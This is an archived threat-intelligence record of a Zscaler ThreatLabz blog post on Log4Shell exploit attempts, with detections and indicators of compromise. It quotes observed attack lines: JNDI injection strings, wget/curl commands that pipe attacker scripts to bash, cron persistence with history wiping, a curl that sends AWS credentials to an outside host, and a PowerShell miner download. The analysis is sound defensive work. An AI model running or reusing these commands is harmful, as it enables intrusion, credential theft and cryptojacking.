{
	"id": "278e16f5-11fd-481c-977b-773678aa3b73",
	"created_at": "2026-04-06T00:09:45.747533Z",
	"updated_at": "2026-04-10T13:12:18.506593Z",
	"deleted_at": null,
	"sha1_hash": "8334ef48c25d0e88417421dd67ef726cdf916a15",
	"title": "ThreatLabz analysis - Log4Shell CVE-2021-44228 Exploit Attempts | Zscaler",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1157444,
	"plain_text": "ThreatLabz analysis - Log4Shell CVE-2021-44228 Exploit Attempts |\r\nZscaler\r\nBy Rubin Azad\r\nPublished: 2021-12-15 · Archived: 2026-04-05 22:37:21 UTC\r\nThe Zscaler ThreatLabz team has been actively monitoring exploit attempts related to the Apache Log4j 0-day Remote Code\r\nExecution Vulnerability (CVE-2021-44228), also known as “Log4Shell.”\r\nIn this blog we will share our analysis of the exploit payloads being delivered using this vulnerability. We will continue to\r\nupdate this blog and share more details as we uncover them during our analysis. \r\nThreatlabz has also published a security advisory related to this vulnerability.\r\nWhat is causing this vulnerability?\r\nThere is a flaw in the Log4j logging library (version 2.0 to 2.15) where an attacker can control log message parameters to\r\nexecute arbitrary code loaded from various JNDI endpoints such as HTTP, LDAP, LDAPS, RMI, DNS, IIOP, etc.\r\nA majority of the exploit payloads seen early on after the patch was released by Apache used HTTP and LDAP protocols to\r\nfetch malicious payloads from attacker server. However, we have now started seeing the use of additional protocols\r\nincluding RMI, DNS, and IIOP to download malicious payloads onto vulnerable servers.\r\nhttps://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts\r\nPage 1 of 8\n\nLog4j Exploit chain: how it works\r\nThe attacker sends maliciously crafted HTTP requests to a web application server running the vulnerable Log4j utility. Once\r\nthe request is received, Log4j tries to load the JNDI resource from an attacker-controlled server and—depending upon the\r\ntype of protocol used—loads additional components. These components can include a shell script or a java class that can\r\nwrite a file to disk or memory and executes the final payload.\r\nWe have observed multiple botnets including Mirai and Kinsing (cryptomining) leveraging this Log4j exploit to target\r\nvulnerable servers on the Internet. In addition to the Mirai and Kinsing families, we have also seen reports of CobaltStrike\r\nand ransomware-related activity from these exploits.\r\nhttps://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts\r\nPage 2 of 8\n\nExploit Commands Observed\r\n${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7...\r\n\u003e wget http://62.210.130[.]250/lh.sh;chmod +x lh.sh;./lh.sh\r\n${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCAtcSAtTy0gaHR0cDovLzYyLjIxMC4xMzAuMj...\r\n\u003e wget -q -O- http://62.210.130[.]250/lh.sh|bash\r\n${jndi:ldap://92.242.40.21:5557/Basic/Command/Base64/KGN1cmwgLXMgOTIuMjQyLjQwLjIxL2xoLnNofHx3...\r\n\u003e (curl -s 92.242.40[.]21/lh.sh||wget -q -O- 92.242.40[.]21/lh.sh)\r\nThreat actors also appear to be leveraging network fingerprinting techniques before serving stage 2 payloads.\r\nThe injected command will include the victim server IP/Port information that will be checked before serving malicious\r\npayloads as seen below.\r\n \r\n${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1Lj…\r\n\u003e (curl -s 45.155.205[.]233:5874/||wget -q -O- 45.155.205[.]233:5874/)|bash\r\nPayload analysis\r\n#1 Mirai Botnet\r\nShell Script lh.sh (MD5: cf2ce888781958e929be430de173a0f8) is downloaded from 62.210.130[.]250 (attacker server).\r\nThis bash script when executed will further download multiple linux binary payloads on the victim machine. The script also\r\nsets execute permissions for the downloaded payloads and runs them. \r\n \r\nwget http://62.210.130[.]250/web/admin/x86;chmod +x x86;./x86 x86;\r\nwget http://62.210.130[.]250/web/admin/x86_g;chmod +x x86_g;./x86_g x86_g;\r\nwget http://62.210.130[.]250/web/admin/x86_64;chmod +x x86_64;./x86_g x86_64;\r\nAll of these binaries belong to the Mirai botnet family and share the same code structure. They are compiled for different\r\narchitectures - x86 32-bit, 64-bit. There is no code to check the architecture; instead the attacker intends to run all binaries\r\nhoping one of them will be successful.\r\nThese Mirai binaries were configured to communicate with C2 domain nazi[.]uy on port 25565 and are capable of\r\nsupporting following commands from the Attacker:\r\nUDP flood\r\nSYN flood\r\nACK flood\r\nTCP stomp flood\r\nGRE IP flood\r\nConnect flood\r\nhttps://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts\r\nPage 3 of 8\n\n#2 Kinsing Malware\r\nShell Script lh2.sh (MD5: 0579a8907f34236b754b07331685d79e) is downloaded from 92.242.40[.]21/lh2.sh it belongs to\r\nthe Kinsing malware family which essentially is a coinminer with rootkit capabilities.\r\nThe stage 1 bash script (lh2.sh) will stop and disable multiple security processes on the victim server before downloading\r\nthe Kinsing binary. This is to ensure that the malicious payload is not detected and blocked from execution.\r\nKinsing is a Golang-based coin miner as shown below:\r\n \r\n92.242.40.21_kinsing: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go\r\nBuildID=DhskS7dCbYzdqxBh_mSk/76qVIoHRKN1NNcfL8ADh/W157t201-UbEisb9Xatk/hOMqvN1a69kKMwHq_e_v,\r\nstripped\r\nThe bash script will also establish persistence by adding a cronjob that will periodically download and execute updated\r\nversions of the bash script from a remote location.\r\nPersistence\r\n \r\nif [ $? -eq 0 ]; then\r\necho \"cron good\"\r\nelse\r\n(\r\nhttps://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts\r\nPage 4 of 8\n\ncrontab -l 2\u003e/dev/null\r\n  echo \"* * * * * $LDR http://185.191.32[.]198/lh.sh | sh \u003e /dev/null 2\u003e\u00261\"\r\n) | crontab -\r\nfi\r\nhistory -c\r\nrm -rf ~/.bash_history\r\nhistory -c\r\nHere, $LDR value is derived from the victim environment and can either be \"wget -q -O -\" or “curl”\r\n185.191.32[.]198/lh.sh downloads and executes the latest Kinsing binary but from 80.71.158[.]12/kinsing\r\n#3 Credential Stealing\r\nWe also observed a few instances where AWS credentials are being stolen and sent to attacker controlled domain\r\n \r\n${jndi:ldap://176.32.33.14/Basic/Command/Base64/Y3VybCAtZCAiJChjYXQgfi8uYXdzL2NyZWRlbnRpYWxzKSIga…\r\n\u003e curl -d \"$(cat ~/.aws/credentials)\" https://c6td5me2vtc0000aq690gdpg14eyyyyyb[.]interactsh[.]com\r\n#4 Monero Miner\r\nWe noticed that the exploitation is not just impacting Linux servers but also targeting Windows servers running vulnerable\r\nversions.\r\nWindows batch file mine.bat (MD5: 3814f201a07cf1a2d5c837c8caeb912f) is downloaded from lurchmath[.]org/wordpress-temp/wp-content/plugins/mine.bat via Powershell. The download file belongs to Monero Miner and uses wallet address\r\n42JKzDhbU76Wbf7JSDhomw6utwLr3N8tjZXLzLwvTcPuP5ZGZiJAHwnD7dNf2ZSAh52i9cUefq2nmLK3azKBffkBMX5b1LY\r\n \r\n${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-\r\np}://142.44.203[.]85:1389/Basic/Command/Base64/cG93ZXJzaGVsbCAtQ29t...\r\n\u003e powershell -Command \"$wc = New-Object System.Net.WebClient; $tempfile =\r\n[System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://lurchmath[.]org/\r\nwordpress-temp/wp-content/plugins/mine.bat', $tempfile); \u0026 $tempfile\r\n42JKzDhbU76Wbf7JSDhomw6utwLr3N8tjZXLzLwvTcPuP5ZGZiJAHwnD7dNf2ZSAh52i9cUefq2nmLK3azKBffkBMX5b1LY\r\nRemove-Item -Force $tempfile\"\r\nIn comparison, mine.bat is similar to what is found on\r\nhxxps://github.com/MoneroOcean/xmrig_setup/blob/master/setup_moneroocean_miner.bat\r\nhttps://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts\r\nPage 5 of 8\n\nMore updates to follow.\r\nZscaler Detections\r\nThreatName DetectionID Type Of Detection\r\nApache.Exploit.CVE-2021-44228 47673 IPS Web - User-Agent\r\nApache.Exploit.CVE-2021-44228 47674 IPS Web - User-Agent\r\nApache.Exploit.CVE-2021-44228 47675 IPS Web - User-Agent\r\nApache.Exploit.CVE-2021-44228 47676 IPS Web - User-Agent\r\nApache.Exploit.CVE-2021-44228 47677 IPS Web - User-Agent\r\nApache.Exploit.CVE-2021-44228 47707 IPS Web - URL\r\nApache.Exploit.CVE-2021-44228 47708 IPS Web - User-Agent\r\nhttps://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts\r\nPage 6 of 8\n\nApache.Exploit.CVE-2021-44228 47711 IPS Web - User-Agent\r\nApache.Exploit.CVE-2021-44228 47801 IPS Web - User-Agent\r\nApache.Exploit.CVE-2021-44228 124803 File-Content (Yara)\r\nApache.Exploit.CVE-2021-44228 - FIle Reputation\r\nLinux.Trojan.Mirai - File Reputation\r\nLinux.Trojan.Mirai.LZ - URL Reputation\r\nLinux.Rootkit.Kinsing - File Reputation\r\nLinux.Rootkit.Kinsing.LZ - URL Reputation\r\nIndicators Of Compromise\r\nMirai Samples\r\n40e3b969906c1a3315e821a8461216bb\r\n6d275af23910c5a31b2d9684bbb9c6f3\r\n1348a00488a5b3097681b6463321d84c\r\nMirai C2\r\nnazi[.]uy\r\nMirai Download URLs\r\n62.210.130[.]250/web/admin/x86\r\n62.210.130[.]250/web/admin/x86_g\r\n62.210.130[.]250/web/admin/x86_64\r\nKinsing Samples\r\n648effa354b3cbaad87b45f48d59c616\r\nKinsing Shell Scripts\r\n92.242.40[.]21/lh2.sh\r\n80.71.158[.]12/lh.sh\r\nKinsing Download URLs\r\n92.242.40[.]21/kinsing\r\nhttps://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts\r\nPage 7 of 8\n\n80.71.158[.]12/kinsing\r\nPersistence\r\n185.191.32[.]198/lh.sh\r\nTop Exploit Server IPs/Domains\r\n18.185.60[.]131:1389\r\n37.233.99[.]127:1389\r\n45.137.21[.]9:1389\r\n45.155.205[.]233:12344\r\n45.155.205[.]233:5874\r\n78.31.71[.]248:1389\r\n92.242.40[.]21:5557\r\n176.32.33[.]14\r\n178.62.74[.]211:8888\r\n198.152.7[.]67:54737\r\n205.185.115[.]217:47324\r\nqloi8d.dnslog[.]cn\r\nu7911j.dnslog[.]cn\r\n90d744e.probe001[.]log4j[.]leakix[.]net:1266\r\n372d7648[.]probe001[.]log4j[.]leakix[.]net:9200\r\n4a3b19ce6368.bingsearchlib[.]com:39356\r\nMonero Miner\r\nlurchmath[.]org/wordpress-temp/wp-content/plugins/\r\nWallet:\r\n42JKzDhbU76Wbf7JSDhomw6utwLr3N8tjZXLzLwvTcPuP5ZGZiJAHwnD7dNf2ZSAh52i9cUefq2nmLK3azKBffkBMX5b1LY\r\nReferences\r\nhttps://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/apache-releases-log4j-version-2150-address-critical-rce\r\nhttps://www.trendmicro.com/en_us/research/20/k/analysis-of-kinsing-malwares-use-of-rootkit.html\r\nhttps://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/\r\nSource: https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts\r\nhttps://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts"
	],
	"report_names": [
		"threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a6c351ea-01f1-4c9b-af75-cfbb3b269ed3",
			"created_at": "2023-01-06T13:46:39.390649Z",
			"updated_at": "2026-04-10T02:00:03.311299Z",
			"deleted_at": null,
			"main_name": "Kinsing",
			"aliases": [
				"Money Libra"
			],
			"source_name": "MISPGALAXY:Kinsing",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434185,
	"ts_updated_at": 1775826738,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8334ef48c25d0e88417421dd67ef726cdf916a15.pdf",
		"text": "https://archive.orkl.eu/8334ef48c25d0e88417421dd67ef726cdf916a15.txt",
		"img": "https://archive.orkl.eu/8334ef48c25d0e88417421dd67ef726cdf916a15.jpg"
	}
}